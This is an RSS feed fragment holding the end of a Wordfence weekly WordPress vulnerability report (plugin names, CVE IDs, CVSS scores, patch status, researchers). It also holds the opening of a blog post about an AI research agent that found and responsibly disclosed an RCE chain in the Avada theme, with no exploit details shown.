<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/492daa1b-e508-40a0-ad4f-1f1d6469d68f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb671c8f-9e14-4f79-adfa-72f48ec02449" target="_blank" rel="noopener">Post Duplicator &lt;= 3.0.11 &#8211; Authorization Bypass to Authenticated (Contributor+) Post Duplication</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4245" target="_blank" rel="noopener noreferrer">							CVE-2026-4245						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-duplicator" target="_blank" rel="noopener">Post Duplicator</a> <span class="wfvr-software-slug">[post-duplicator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cb9373b67e4240c01c77d2af2ea71179.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb9373b67e4240c01c77d2af2ea71179"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener">Quốc Huy (jtwings)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb671c8f-9e14-4f79-adfa-72f48ec02449" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64553742-ff2b-40e9-92c3-3458a9f988a2" target="_blank" rel="noopener">Post Duplicator &lt;= 3.0.11 &#8211; Missing Authorization to Authenticated (Contributor+) Post Duplication with Arbitrary Author Attribution</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4244" target="_blank" rel="noopener noreferrer">							CVE-2026-4244						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-duplicator" target="_blank" rel="noopener">Post Duplicator</a> <span class="wfvr-software-slug">[post-duplicator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abi-wiranata" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d514c4acdca56b936f2a77bb9df74e28.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d514c4acdca56b936f2a77bb9df74e28"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abi-wiranata" target="_blank" rel="noopener">Abi Wiranata</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64553742-ff2b-40e9-92c3-3458a9f988a2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1e041f0-3019-4d1f-b1a3-b40275c0966a" target="_blank" rel="noopener">PPWP: Password Protect Pages, Posts &amp; Full or Partial Content &lt;= 1.9.15 &#8211; Improper Authorization To Authenticated (Contributor+) Master Password Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-11729" target="_blank" rel="noopener noreferrer">							CVE-2025-11729						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-protect-page" target="_blank" rel="noopener">PPWP – Password Protect Pages</a> <span class="wfvr-software-slug">[password-protect-page]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1e041f0-3019-4d1f-b1a3-b40275c0966a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a07df12c-375d-4a98-b5f6-aa14cfd432a4" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely &lt; 7.0.7 &#8211; Authenticated (Subscriber+) Payment Bypass</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19711" target="_blank" rel="noopener noreferrer">							CVE-2026-19711						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0da320f0ff233e1fc5948be78c4a9693.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0da320f0ff233e1fc5948be78c4a9693"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a07df12c-375d-4a98-b5f6-aa14cfd432a4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0767e5ef-477f-4b0c-a86e-6298614c9777" target="_blank" rel="noopener">Quiz And Survey Master &lt;= 11.2.3 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14826" target="_blank" rel="noopener noreferrer">							CVE-2026-14826						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</a> <span class="wfvr-software-slug">[quiz-master-next]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0767e5ef-477f-4b0c-a86e-6298614c9777" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8c9c37e2-c9f7-4a07-94d0-51298d98ff80" target="_blank" rel="noopener">Quiz And Survey Master &lt;= 11.2.3 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14825" target="_blank" rel="noopener noreferrer">							CVE-2026-14825						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</a> <span class="wfvr-software-slug">[quiz-master-next]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8c9c37e2-c9f7-4a07-94d0-51298d98ff80" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f2b1e9a7-cbbd-4915-a1bb-e98bb70aa6a1" target="_blank" rel="noopener">Slider by 10Web – Responsive Image Slider &lt;= 1.2.62 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66635" target="_blank" rel="noopener noreferrer">							CVE-2026-66635						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slider-wd" target="_blank" rel="noopener">Slider by 10Web – Responsive Image Slider</a> <span class="wfvr-software-slug">[slider-wd]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f2b1e9a7-cbbd-4915-a1bb-e98bb70aa6a1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/080f3a37-ed11-456c-8c2a-4120bb6fa189" target="_blank" rel="noopener">SmartCrawl SEO checker, analyzer &amp; optimizer &lt; 3.16.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16979" target="_blank" rel="noopener noreferrer">							CVE-2026-16979						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smartcrawl-seo" target="_blank" rel="noopener">SmartCrawl SEO checker, analyzer &amp; optimizer</a> <span class="wfvr-software-slug">[smartcrawl-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ezekiel-victor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/26f3449f5fd6f5b863626494f64fdb7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26f3449f5fd6f5b863626494f64fdb7e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ezekiel-victor" target="_blank" rel="noopener">Ezekiel Victor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/080f3a37-ed11-456c-8c2a-4120bb6fa189" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fb1735ce-88a9-4796-94cf-2ed213a2ea68" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator &lt; 4.0.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19726" target="_blank" rel="noopener noreferrer">							CVE-2026-19726						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</a> <span class="wfvr-software-slug">[visualizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0da320f0ff233e1fc5948be78c4a9693.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0da320f0ff233e1fc5948be78c4a9693"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fb1735ce-88a9-4796-94cf-2ed213a2ea68" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6fa5566f-b814-4173-8f7d-9a514397d653" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters &lt; 4.9.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18466" target="_blank" rel="noopener noreferrer">							CVE-2026-18466						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters</a> <span class="wfvr-software-slug">[wp-google-map-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/xanlar-agamalizade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/434560acf2fecc645eba83eb388be4dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="434560acf2fecc645eba83eb388be4dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/xanlar-agamalizade" target="_blank" rel="noopener">Xanlar Agamalizade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6fa5566f-b814-4173-8f7d-9a514397d653" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51982774-5999-4f98-a635-3f099f779efb" target="_blank" rel="noopener">WPS Bidouille &lt; 1.33.5 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19782" target="_blank" rel="noopener noreferrer">							CVE-2026-19782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-bidouille" target="_blank" rel="noopener">WPS Bidouille</a> <span class="wfvr-software-slug">[wps-bidouille]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51982774-5999-4f98-a635-3f099f779efb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-17-2026-to-august-23-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (August 17, 2026 to August 23, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Argus Finds Complex 6 Step Critical RCE in Avada Theme with 1 Million Sales</title>
		<link>https://swiftupdates.ca/wordfence-argus-finds-complex-6-step-critical-rce-in-avada-theme-with-1-million-sales/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 25 Aug 2026 18:41:22 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-argus-finds-complex-6-step-critical-rce-in-avada-theme-with-1-million-sales/</guid>

					<description><![CDATA[A year ago we wrote that we’d put AI to work across the whole company, turning everyone on the team into a capable AI operator so our defenders could stay ahead of the threat actors attacking the sites we protect. In April we showed where it was heading: in the space of a few months, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>A year ago we wrote that we’d <a href="https://www.wordfence.com/blog/2025/08/pushing-boundaries-with-claude-code/" target="_blank" rel="noopener">put AI to work across the whole company</a>, turning everyone on the team into a capable AI operator so our defenders could stay ahead of the threat actors attacking the sites we protect. In <a href="https://www.wordfence.com/blog/2026/04/the-increasing-role-of-ai-in-vulnerability-research/" target="_blank" rel="noopener">April we showed where it was heading</a>: in the space of a few months, AI-assisted reports to our bug bounty program had gone from 16% to about two-thirds of everything we received, and it wasn’t slowing down.</p>
<p>As we continue to see AI driven innovation in cybersecurity, the Wordfence team continues to accelerate our own pace of AI enabled innovation. <a href="https://www.wordfence.com/blog/2026/07/a-new-threat-landscape-meets-a-new-kind-of-defender/" target="_blank" rel="noopener">PRISM, our autonomous research agent, is now the most prolific researcher we have</a>, with over 300 vulnerabilities to its name and the top spot on our leaderboard over the last 30 days. In July it <a href="https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/" target="_blank" rel="noopener">caught a supply-chain backdoor in a 20,000-install plugin less than two hours after the malicious code went in</a>. Around the same time, a prompt technique borrowed from a math breakthrough turned up the first unauthenticated, no requirement, <a href="https://www.slcyber.io/research/wp2shell-pre-authentication-rce-in-wordpress-core" target="_blank" rel="noopener">WordPress core RCE</a> in a decade after roughly ten hours of machine time.</p>
<p>This post is one more data point on that trend line, and for us, it’s where things get interesting: We are now using AI to do the kind of deep, multi-step exploitation that used to take a skilled human weeks or months. And we are compressing that work into a few unattended hours.</p>
<p>Using an agentic framework we developed, code named <strong>Argus</strong>, we found and reproduced a critical, unauthenticated remote code execution vulnerability chain in <a href="https://avada.com/" target="_blank" rel="noopener"><strong>Avada</strong></a>, one of the best-selling WordPress themes ever made with over a million sales. An unauthenticated attacker could run arbitrary PHP on the server without ever logging in or getting a victim to click anything. Argus found the whole chain and proved it, start to finish, in about two hours.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> customers received a firewall rule to provide protection against known exploitation techniques on July 30, 2026, the day we confirmed the vulnerability. Free users will get the same rule 30 days later, on August 29, 2026.</p>
<p>We provided full disclosure details to the ThemeFusion team through our Wordfence <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Vulnerability Management Portal</a> on August 5, 2026. The developer acknowledged the report on August 10, 2026 and released a public patch on August 25, 2026. We would like to commend the ThemeFusion team for their prompt response and timely patch.</p>
<h2>Breadth and Depth</h2>
<p>We think about AI research two ways, and we build for both.</p>
<p><strong>BREADTH for coverage: </strong><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">PRISM</a> is the breadth-first half. It sweeps an enormous surface across every bug class and threat model, on its own, all day. That’s how you cover a whole ecosystem, and how you notice a backdoor two hours after it makes its way onto the WordPress plugins repository.</p>
